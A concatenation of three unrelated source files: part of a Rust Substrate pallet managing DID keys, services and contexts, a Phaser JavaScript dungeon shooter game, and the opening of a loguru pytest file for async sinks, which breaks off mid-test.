<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddKey(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn deactivate_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(account_id_list.contains(&key), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.deactivate_acc(&key));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateKey(did, key));
Ok(())
}
#[weight = 0]
pub fn add_new_auth_key(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.contains(&key), Error::<T>::AccountIdExist);
<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
let index: u32 = (account_id_list.len() - 1) as u32;
AuthenticationStore::mutate(&did, |c| c.push(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddNewAuthKey(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn set_auth_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.set_acc_auth(&key));
AuthenticationStore::mutate(&did, |c| c.push(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::SetAuthKey(did, key));
Ok(())
}
#[weight = 0]
pub fn deactivate_auth_key(origin, did: Vec<u8>, key: T::AccountId) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let authentication_list = AuthenticationStore::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.remove_acc_auth(&key));
let i = authentication_list
.iter()
.position(|x| x == &(index.unwrap() as u32))
.unwrap();
AuthenticationStore::mutate(&did, |c| c.remove(i));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateAuthKey(did, key));
Ok(())
}
#[weight = 0]
pub fn add_new_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, pk_controller: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
ensure!(!account_id_list.have_access(&key), Error::<T>::AccountIdExist);
<PkListStore<T>>::mutate(&did, |c| c.push(Pk::<T::AccountId>::new_acc(controller.clone(), key.clone())));
let index: u32 = (account_id_list.len() - 1) as u32;
AuthenticationStore::mutate(&did, |c| c.push(index));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddNewAuthKeyByController(did, key, controller));
Ok(())
}
#[weight = 0]
pub fn set_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.set_acc_auth(&key));
AuthenticationStore::mutate(&did, |c| c.push(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::SetAuthKeyByController(did, key));
Ok(())
}
#[weight = 0]
pub fn deactivate_auth_key_by_controller(origin, did: Vec<u8>, key: T::AccountId, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
let account_id_list = <PkListStore<T>>::get(&did);
let authentication_list = AuthenticationStore::get(&did);
let index = account_id_list.find_acc(&key);
ensure!(index.is_some(), Error::<T>::AccountIdNotExist);
<PkListStore<T>>::mutate(&did, |c| c.remove_acc_auth(&key));
let i = authentication_list
.iter()
.position(|x| x == &(index.unwrap() as u32))
.unwrap();
AuthenticationStore::mutate(&did, |c| c.remove(i));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::DeactivateAuthKeyByController(did, key));
Ok(())
}
#[weight = 0]
pub fn add_service(origin, did: Vec<u8>, service_id: Vec<u8>, service_type: Vec<u8>, endpoint: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let ser = Service {
id: service_id.clone(),
tp: service_type.clone(),
service_endpoint: endpoint.clone(),
};
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &ser.id);
ensure!(index.is_none(), Error::<T>::ServiceExist);
ServiceStore::mutate(&did, |c| c.push(ser));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddService(did, service_id, service_type, endpoint));
Ok(())
}
#[weight = 0]
pub fn update_service(origin, did: Vec<u8>, service_id: Vec<u8>, service_type: Vec<u8>, endpoint: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &service_id);
ensure!(index.is_some(), Error::<T>::ServiceNotExist);
ServiceStore::mutate(&did, |c| {
let ser = c.get_mut(index.unwrap()).unwrap();
ser.id = service_id.clone();
ser.tp = service_type.clone();
ser.service_endpoint = endpoint.clone();
});
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::UpdateService(did, service_id, service_type, endpoint));
Ok(())
}
#[weight = 0]
pub fn remove_service(origin, did: Vec<u8>, service_id: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let service_list = ServiceStore::get(&did);
let index = service_list.iter().position(|x| &x.id == &service_id);
ensure!(index.is_some(), Error::<T>::ServiceNotExist);
ServiceStore::mutate(&did, |c| c.remove(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveService(did, service_id));
Ok(())
}
#[weight = 0]
pub fn add_context(origin, did: Vec<u8>, context: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let context_list = ContextStore::get(&did);
ensure!(!context_list.contains(&context), Error::<T>::ContextExist);
ContextStore::mutate(&did, |c| c.push(context.clone()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::AddContext(did, context));
Ok(())
}
#[weight = 0]
pub fn remove_context(origin, did: Vec<u8>, context: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
let context_list = ContextStore::get(&did);
ensure!(context_list.contains(&context), Error::<T>::ContextNotExist);
let index = context_list.iter().position(|x| *x == context);
ContextStore::mutate(&did, |c| c.remove(index.unwrap()));
let now_timestamp = <pallet_timestamp::Module<T>>::now();
<UpdatedStore<T>>::mutate(&did, |c| *c = now_timestamp);
Self::deposit_event(RawEvent::RemoveContext(did, context));
Ok(())
}
#[weight = 0]
pub fn verify_signature(origin, did: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
Self::check_access(&did, &sender)?;
Self::deposit_event(RawEvent::VerifySignature(did));
Ok(())
}
#[weight = 0]
pub fn verify_controller(origin, did: Vec<u8>, controller: Vec<u8>) -> dispatch::DispatchResult {
let sender = ensure_signed(origin)?;
Self::check_did_status(&did)?;
let controller_list = ControllerStore::get(&did);
ensure!(controller_list.contains(&controller), Error::<T>::ControllerNotExist);
Self::check_access(&controller, &sender)?;
Self::deposit_event(RawEvent::VerifyController(did, controller));
Ok(())
}
}
}
impl<T: Trait> Module<T> {
pub fn check_did_status(did: &Vec<u8>) -> dispatch::DispatchResult {
ensure!(StatusStore::contains_key(did), Error::<T>::NotRegistered);
if StatusStore::get(did) != VALID {
Err(Error::<T>::Invalid.into())
} else {
Ok(())
}
}
pub fn check_access(did: &Vec<u8>, caller: &T::AccountId) -> dispatch::DispatchResult {
let pk_list = <PkListStore<T>>::get(did);
ensure!(pk_list.have_access(caller), Error::<T>::NoAccess);
Ok(())
}
}
impl<T> Module<T>
where
T: Trait,
<T as frame_system::Trait>::AccountId: core::convert::AsRef<[u8]> {
pub fn get_document(did: Vec<u8>) -> Option<Document<T::Moment>> {
let id = str::from_utf8(&did).ok().unwrap();
let pk_list = <PkListStore<T>>::get(&did);
let pk_list_json = pk_list.to_json(&did);
let authentication_list = AuthenticationStore::get(&did);
let authentication_json = pk_list.to_authentication_json(&did, authentication_list);
let context_list = ContextStore::get(&did);
let mut contexts_json = Vec::new();
for v in context_list.iter() {
let s = str::from_utf8(&v).ok().unwrap().to_string();
contexts_json.push(s);
}
let controller_list = ControllerStore::get(&did);
let mut controller_json = Vec::new();
for v in controller_list.iter() {
let s = str::from_utf8(&v).ok().unwrap().to_string();
controller_json.push(s);
}
let service_list = ServiceStore::get(&did);
let mut service_json = Vec::new();
for v in service_list.iter() {
service_json.push(v.to_json());
}
let created = <CreatedStore<T>>::get(&did);
let updated = <UpdatedStore<T>>::get(&did);
let document = Document {
id: id.to_string(),
public_key: pk_list_json,
authentication: authentication_json,
contexts: contexts_json,
controller: controller_json,
service: service_json,
created,
updated,
};
Some(document)
}
}
| len |
main.js | function Grunt(index, game, player, bullets, x, y) {
this.game = game;
this.player = player;
this.bullets = bullets;
this.health = 3;
this.fireRate = 1000;
this.nextFire = 0;
this.alive = true;
this.grunt = game.add.sprite(x, y, 'grunt');
this.grunt.anchor.setTo(0.5);
this.grunt.animations.add('draw');
this.grunt.animations.play('draw', 15, true);
this.grunt.name = index;
game.physics.enable(this.grunt, Phaser.Physics.ARCADE);
}
Grunt.prototype.damage = function() {
this.health -= playerDamage;
if (this.health <= 0) {
this.alive = false;
//this.grunt.kill();
return true;
}
return false;
};
Grunt.prototype.update = function(player, enemies) {
this.player = player;
var distance = this.game.physics.arcade.distanceBetween(this.grunt, this.player);
if (distance < 300) {
//approach the player without stepping into other grunts
var approachAng = this.game.math.angleBetween(this.grunt.x, this.grunt.y, this.player.x, this.player.y);
var avoidDist = 150; //closest allowed to get to other enemies
var minDist = 150; //closest allowed to get to player
var avoidAngle = 0;
for (var i = 0; i < enemies.length; i++) {
if (this.grunt == enemies[i].grunt)
break;
if (avoidAngle !== 0)
break;
var dist = this.game.physics.arcade.distanceBetween(this.grunt, enemies[i].grunt);
if (dist < avoidDist) {
avoidAngle = Math.PI / 2;
if (Phaser.Utils.chanceRoll(50))
avoidAngle += -1;
}
}
approachAng += avoidAngle;
if (distance > minDist) {
this.grunt.body.velocity.x = Math.cos(approachAng) * 125;
this.grunt.body.velocity.y = Math.sin(approachAng) * 125;
}
else {
this.grunt.body.velocity.setTo(0, 0);
}
//shoot the bullets
if (this.game.time.now > this.nextFire && this.bullets.countDead() > 0 && isPlayerAlive) {
this.nextFire = this.game.time.now + this.fireRate;
var bullet = this.bullets.getFirstDead();
bullet.reset(this.grunt.x, this.grunt.y);
bullet.animations.add('draw');
bullet.play('draw', 15, true);
bullet.rotation = this.game.physics.arcade.moveToObject(bullet, this.player, 500);
game.sound.play('bullet-fire', sfxVol);
}
}
};
var game = new Phaser.Game(800, 600, Phaser.AUTO, '');
var sfxVol = 1;
var musicVol = 1;
var health = 8;
var playerFireRate = 1000;
var playerNextFire = 0;
var playerDamage = 1;
var playerTransformations = [];
var currentTransformation = 'player_square';
var playerItems = [];
var isPlayerAlive = true;
var isInvulnerable = false;
var currentLevel = 0;
var MIN_FIRE_RATE = 100;
var MAX_DAMAGE = 4;
var MAX_HEALTH = 8;
function reset() {
health = 8;
playerFireRate = 1000;
playerNextFire = 0;
playerDamage = 1;
playerTransformations = [];
playerItems = [];
isPlayerAlive = true;
isInvulnerable = false;
currentLevel = 0;
game.state.start('Game');
}
function advance() {
isInvulnerable = false;
currentLevel++;
game.state.start('Game');
}
var Dungeon = {
//Dungeon creation algorithm based off of https://github.com/plissken2013es/phaserRandomDungeon
create: function() {
game.physics.startSystem(Phaser.Physics.ARCADE);
game.world.setBounds(0, 0, 4200, 4200);
game.physics.arcade.sortDirection = Phaser.Physics.Arcade.SORT_NONE;
this.erase = game.sound.add('erase', sfxVol);
this.keyboard = game.input.keyboard;
this.walls = game.add.group();
this.walls.enableBody = true;
this.walls.physicsBodyType = Phaser.Physics.ARCADE;
this.floors = game.add.group();
this.items = game.add.group();
this.room_max = 8;
this.room_min = 4;
this.max_rooms = this.rand(8, 16);
this.roomCenters = [];
this.roomCoords = [];
this.rooms = [];
this.lastRoom = {
x: 0,
y: 0
};
this.numRooms = 0;
this.exit = {};
this.exit = game.add.sprite(this.exit.x, this.exit.y, 'exit');
this.exit.anchor.setTo(0.5);
this.exit.animations.add('draw');
this.exit.animations.play('draw', 15, true);
game.physics.arcade.enable(this.exit);
this.enemyBullets = game.add.group();
this.enemyBullets.enableBody = true;
this.enemyBullets.physicsBodyType = Phaser.Physics.ARCADE;
this.enemyBullets.createMultiple(100, 'enemy-bullet');
this.enemyBullets.setAll('anchor.x', 0.5);
this.enemyBullets.setAll('anchor.y', 0.5);
this.enemyBullets.setAll('outOfBoundsKill', true);
this.enemyBullets.setAll('checkWorldBounds', true);
this.bullets = game.add.group();
this.bullets.enableBody = true;
this.bullets.physicsBodyType = Phaser.Physics.ARCADE;
this.bullets.createMultiple(100, 'bullet');
this.bullets.setAll('anchor.x', 0.5);
this.bullets.setAll('anchor.y', 0.5);
this.bullets.setAll('outOfBoundsKill', true);
this.bullets.setAll('checkWorldBounds', true);
this.player = {};
this.enemies = [];
this.enemiesTotal = this.rand(12, 25);
this.enemiesAlive;
this.itemsTotal = this.rand(8, 12);
this.makeMap();
this.populate();
this.enemiesAlive = this.enemies.length;
this.player = game.add.sprite(this.player.x, this.player.y, currentTransformation);
this.player.animations.add('draw', [0, 1, 2, 3, 99]); //player's idle animation after having changed
this.player.animations.add('change', Phaser.ArrayUtils.numberArrayStep(4, 100)); //player animation for transformation
this.player.animations.add('erase', Phaser.ArrayUtils.numberArrayStep(99, 115)); //player's death animation
this.player.animations.play('draw', 15, true);
this.player.anchor.setTo(0.5);
game.physics.arcade.enable(this.player);
this.player.body.setSize(70, 70);
this.healthPos = 8 - health;
this.healthUI = game.add.sprite(50, 50, 'health', this.healthPos);
this.healthUI.fixedToCamera = true;
this.damagenotif = game.add.sprite(game.world.centerX, game.world.centerY + 150, 'damagenotif');
this.frnotif = game.add.sprite(game.world.centerX, game.world.centerY + 150, 'frnotif');
this.damagenotif.fixedToCamera = true;
this.frnotif.fixedToCamera = true;
this.damagenotif.kill();
this.frnotif.kill();
game.camera.follow(this.player, Phaser.Camera.FOLLOW_TOPDOWN_TIGHT);
},
rand: function(min, max) {
return Math.floor(Math.random() * (max - min)) + min;
},
populate: function() {
//fill map with enemies
var entityMap = [];
this.exit.x = this.roomCenters[this.numRooms - 1].x;
this.exit.y = this.roomCenters[this.numRooms - 1].y;
entityMap.push({
x: this.exit.x,
y: this.exit.y
});
for (var i = 0; i < this.enemiesTotal; i++) {
var randIndex = this.rand(0, this.roomCoords.length - 1);
var randX = this.roomCoords[randIndex].x + 50;
var randY = this.roomCoords[randIndex].y + 50;
while (this.roomCoords[randIndex].room === 0) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
if (entityMap.length > 0) {
for (var j = 0; j < entityMap.length; j++) {
if (randX === entityMap[j].x && randY === entityMap[j].y) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
}
}
this.enemies.push(new Grunt(i, game, this.player, this.enemyBullets, randX, randY));
game.physics.arcade.overlap(this.enemies[i].grunt, this.walls, function(grunt, wall) {
grunt.x -= wall.body.overlapX;
grunt.y -= wall.body.overlapY;
});
entityMap.push({
x: this.enemies[i].grunt.x,
y: this.enemies[i].grunt.y
});
}
//fill map with items
for (var i = 0; i < this.itemsTotal; i++) {
var item;
var randIndex = this.rand(0, this.roomCoords.length - 1);
var randX = this.roomCoords[randIndex].x + 50;
var randY = this.roomCoords[randIndex].y + 50;
while (this.roomCoords[randIndex].room === 0) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
if (entityMap.length > 0) {
for (var j = 0; j < entityMap.length; j++) {
if (randX === entityMap[j].x && randY === entityMap[j].y) {
randIndex = this.rand(1, this.roomCoords.length - 1);
randX = this.roomCoords[randIndex].x + 50;
randY = this.roomCoords[randIndex].y + 50;
}
}
}
if (Phaser.Utils.chanceRoll(50)) {
item = this.items.create(randX, randY, 'damageIncrease');
}
else {
item = this.items.create(randX, randY, 'fireRateUp');
}
game.physics.arcade.enable(item);
}
},
// Room: function(x, y, w, h) {
// this.x1 = x;
// this.y1 = y;
// this.x2 = x + w;
// this.y2 = y + h;
// var center_x = (this.x1 + this.x2) / 2;
// var center_y = (this.y1 + this.y2) / 2;
// this.center_coords = {
// x: center_x,
// y: center_y
// };
// },
createFloor: function(x, y) {
var fl = this.floors.create(x, y, 'floor');
game.physics.arcade.enable(fl);
game.physics.arcade.overlap(fl, this.walls, function(floor, wall) {
wall.destroy();
});
},
createRoom: function(x1, x2, y1, y2, roomNum) {
for (var x = x1; x < x2; x += 100) {
for (var y = y1; y < y2; y += 100) {
this.createFloor(x, y);
this.roomCoords.push({
x: x,
y: y,
room: roomNum
});
}
}
},
createHTunnel: function(x1, x2, y) {
var min = Math.min(x1, x2);
var max = Math.max(x1, x2);
for (var x = min; x < max + 100; x += 100) {
this.createFloor(x, y);
}
},
createVTunnel: function(y1, y2, x) {
var min = Math.min(y1, y2);
var max = Math.max(y1, y2);
for (var y = min; y < max + 100; y += 100) {
this.createFloor(x, y);
}
},
makeMap: function() {
//fill the world with walls
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
var wall = this.walls.create(x, y, 'wall');
wall.body.immovable = true;
wall.animations.add('draw');
wall.play('draw', 15, true);
}
}
//carving out the rooms
for (var r = 0; r < this.max_rooms; r++) {
var w = this.rand(this.room_min, this.room_max) * 100;
var h = this.rand(this.room_min, this.room_max) * 100;
x = this.rand(1, ((game.world.width / 100) - (w / 100 + 1))) * 100;
y = this.rand(1, ((game.world.height / 100) - (h / 100 + 1))) * 100;
this.createRoom(x, x + w, y, y + h, this.numRooms);
if (this.numRooms === 0) {
this.player.x = x + (w / 2);
this.player.y = y + (h / 2);
}
else {
var new_x = game.math.snapToFloor(x + (w / 2), 100);
var new_y = game.math.snapToFloor(y + (h / 2), 100);
var prev_x = game.math.snapToFloor(this.lastRoom.x, 100);
var prev_y = game.math.snapToFloor(this.lastRoom.y, 100);
this.createHTunnel(prev_x, new_x, prev_y);
this.createVTunnel(prev_y, new_y, new_x);
}
this.lastRoom = {
x: x + (w / 2),
y: y + (h / 2)
};
this.roomCenters.push(this.lastRoom);
this.numRooms++;
}
},
update: function() {
this.game.physics.arcade.TILE_BIAS = 40;
game.physics.arcade.collide(this.walls, this.player);
game.physics.arcade.overlap(this.player, this.items, this.itemsHandler, null, this);
game.physics.arcade.overlap(this.enemyBullets, this.player, this.bulletHitPlayer, null, this);
game.physics.arcade.overlap(this.exit, this.player, this.exitLevel, null, this);
game.physics.arcade.overlap(this.enemyBullets, this.walls, this.bulletHitWall, null, this);
game.physics.arcade.overlap(this.bullets, this.walls, this.bulletHitWall, null, this);
for (var i = 0; i < this.enemies.length; i++) {
if (this.enemies[i].alive) {
game.physics.arcade.collide(this.player, this.enemies[i].grunt);
game.physics.arcade.collide(this.enemies[i].grunt, this.walls);
game.physics.arcade.overlap(this.bullets, this.enemies[i].grunt, this.bulletHitEnemy, null, this);
game.physics.arcade.overlap(this.enemies[i].grunt, this.walls, function(grunt, wall) {
grunt.x -= wall.body.overlapX;
grunt.y -= wall.body.overlapY;
});
this.enemies[i].update(this.player, this.enemies);
}
else {
this.enemiesAlive--;
}
}
//set horizontal movement to left and right arrow keys
if (isPlayerAlive){
if (this.keyboard.isDown(Phaser.KeyCode.LEFT)) {
this.player.body.velocity.x = -175;
}
else if (this.keyboard.isDown(Phaser.KeyCode.RIGHT)) {
this.player.body.velocity.x = 175;
}
else {
this.player.body.velocity.x = 0;
}
//set vertical movement to up and down arrow keys
if (this.keyboard.isDown(Phaser.KeyCode.UP)) {
this.player.body.velocity.y = -175;
}
else if (this.keyboard.isDown(Phaser.KeyCode.DOWN)) {
this.player.body.velocity.y = 175;
}
else {
this.player.body.velocity.y = 0;
}
//TODO add player shooting input
if (game.input.activePointer.isDown) {
if (game.time.now > playerNextFire && this.bullets.countDead() > 0) {
playerNextFire = game.time.now + playerFireRate;
var bullet = this.bullets.getFirstDead();
bullet.reset(this.player.x, this.player.y);
bullet.animations.add('draw');
bullet.play('draw', 15, true);
bullet.rotation = this.game.physics.arcade.moveToPointer(bullet, 500);
game.sound.play('bullet-fire', sfxVol);
}
}
}
},
bulletHitEnemy: function(enemy, bullet) {
bullet.kill();
var destroyed = this.enemies[enemy.name].damage();
if (destroyed) {
//TODO add death animation
if (Phaser.Utils.chanceRoll(25)) {
var item = this.items.create(enemy.x, enemy.y, 'healthup');
game.physics.arcade.enable(item);
}
enemy.kill();
}
},
bulletHitPlayer: function(player, bullet) {
bullet.kill();
//TODO make player take damage
if (!isInvulnerable) {
health -= 1;
this.healthUI.frame++;
}
if (health <= 0) {
isPlayerAlive = false;
isInvulnerable = true;
game.physics.arcade.isPaused = true;
this.erase.play();
player.play('erase', 15, false, true);
game.physics.arcade.isPaused = false;
this.erase.onStop.add(function(sound) {
game.state.start('GameOver');
});
}
},
bulletHitWall: function(bullet, wall) {
bullet.kill();
},
exitLevel: function(exit, player) {
isInvulnerable = true;
this.erase.play();
player.play('erase', 15, false, true);
this.erase.onStop.add(function(sound) {
game.state.start('Complete');
});
},
itemsHandler: function(player, item) {
if (item.key === 'damageIncrease' && playerDamage < MAX_DAMAGE) {
playerDamage += .5;
if(this.frnotif.alive){
this.frnotif.kill();
}
if(!this.damagenotif.alive){
this.damagenotif.revive();
game.time.events.add(2000, this.damagenotif.kill);
}
}
else if (item.key === 'fireRateUp' && playerFireRate > MIN_FIRE_RATE) {
playerFireRate /= 2;
if(this.damagenotif.alive){
this.damagenotif.kill();
}
if(!this.frnotif.alive){
this.frnotif.revive();
game.time.events.add(2000, this.frnotif.kill);
}
}
else if (item.key === 'healthup' && health < MAX_HEALTH) {
health++;
this.healthUI.frame--;
}
item.kill();
}
};
var GameOverState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'youdied');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.tryagain = game.add.button(game.world.centerX, game.world.centerY, 'tryagain', reset, this);
this.tryagain.anchor.setTo(0.5);
this.tryagain.animations.add('jitter');
},
update: function() {
this.tryagain.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.tryagain.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var MainMenuState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'title');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.start = game.add.button(game.world.centerX, game.world.centerY, 'start', reset, this);
this.start.anchor.setTo(0.5);
this.start.animations.add('jitter');
},
update: function() {
this.start.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.start.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var CompletedState = {
create: function() {
game.world.setBounds(0, 0, 800, 600);
this.floors = game.add.group();
for (var y = 0; y < game.world.height; y += 100) {
for (var x = 0; x < game.world.width; x += 100) {
this.floors.create(x, y, 'floor');
}
}
this.title = game.add.sprite(game.world.centerX, 60, 'levelcomplete');
this.title.anchor.setTo(0.5);
this.title.animations.add('jitter');
this.title.play('jitter', 15, true);
this.start = game.add.button(game.world.centerX, game.world.centerY, 'start', advance, this);
this.start.anchor.setTo(0.5);
this.start.animations.add('jitter');
},
update: function() {
this.start.events.onInputOver.add(function(button, cursor) {
button.play('jitter', 15, true);
});
this.start.events.onInputOut.add(function(button, cursor) {
button.animations.stop('jitter');
});
}
};
var BootState = {
preload: function() {
game.load.bitmapFont('baskerville', './assets/baskerville_0.png', './assets/baskerville.xml');
game.load.spritesheet('title', './assets/title.png', 401, 121);
game.load.spritesheet('tryagain', './assets/tryagain.png', 288, 121);
game.load.spritesheet('start', './assets/start.png', 288, 121);
game.load.spritesheet('options', './assets/options.png', 288, 121);
},
create: function() {
game.state.start('Load');
}
};
var LoadState = {
preload: function() {
var loadLabel = game.add.bitmapText(80, 150, 'baskerville', 'Loading...', 32);
game.load.spritesheet('player_square', './assets/player_square.png', 70, 70);
game.load.spritesheet('wall', './assets/wall_scribble.png', 100, 100);
game.load.image('floor', './assets/floor_graph.png');
game.load.spritesheet('bullet', './assets/player_bullet.png', 16, 16);
game.load.spritesheet('enemy-bullet', './assets/enemy_bullet.png', 16, 16);
game.load.spritesheet('grunt', './assets/enemy_square.png', 70, 70);
game.load.spritesheet('youdied', './assets/youdied.png', 401, 121);
game.load.spritesheet('damagenotif', './assets/damagenotif.png', 401, 121);
game.load.spritesheet('frnotif', './assets/frnotif.png', 401, 121);
game.load.spritesheet('damageIncrease', './assets/damageIncrease.png', 50, 50);
game.load.spritesheet('fireRateUp', './assets/fireRateUp.png', 50, 50);
game.load.spritesheet('healthup', './assets/healthup.png', 50, 50);
game.load.spritesheet('health', './assets/health.png', 100, 100);
game.load.spritesheet('exit', './assets/exit.png', 100, 100);
game.load.spritesheet('levelcomplete', './assets/levelcomplete.png', 401, 121);
game.load.audio('bullet-fire', './assets/fire_bullet.ogg');
game.load.audio('erase', './assets/erase.ogg');
game.sound.add('bullet-fire', sfxVol);
},
create: function() {
game.state.start('MainMenu');
}
};
game.state.add('Boot', BootState);
game.state.add('Load', LoadState);
game.state.add('Game', Dungeon); | game.state.add('GameOver', GameOverState);
game.state.add('MainMenu', MainMenuState);
game.state.add('Complete', CompletedState);
game.state.start('Boot'); |
|
test_coroutine_sink.py | import asyncio
import logging
import multiprocessing
import re
import sys
import threading
import pytest
import loguru
from loguru import logger
async def async_writer(msg):
await asyncio.sleep(0.01)
print(msg, end="")
class AsyncWriter:
async def __call__(self, msg):
await asyncio.sleep(0.01)
print(msg, end="")
def test_coroutine_function(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_async_callable_sink(capsys):
async def worker():
logger.debug("A message")
await logger.complete()
logger.add(AsyncWriter(), format="{message}")
asyncio.run(worker())
out, err = capsys.readouterr()
assert err == ""
assert out == "A message\n"
def test_concurrent_execution(capsys):
async def task(i):
logger.debug("=> {}", i)
async def main():
tasks = [task(i) for i in range(10)]
await asyncio.gather(*tasks)
await logger.complete()
logger.add(async_writer, format="{message}")
asyncio.run(main())
out, err = capsys.readouterr()
assert err == ""
